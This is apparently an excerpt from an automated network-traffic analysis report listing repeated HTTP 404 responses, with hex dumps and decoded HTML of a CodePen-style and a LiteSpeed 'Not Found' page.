<title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:03:27 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:03:30 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:03:32 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 01:03:38 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 01:03:41 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 01:03:44 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 01:03:46 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 01:03:52 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 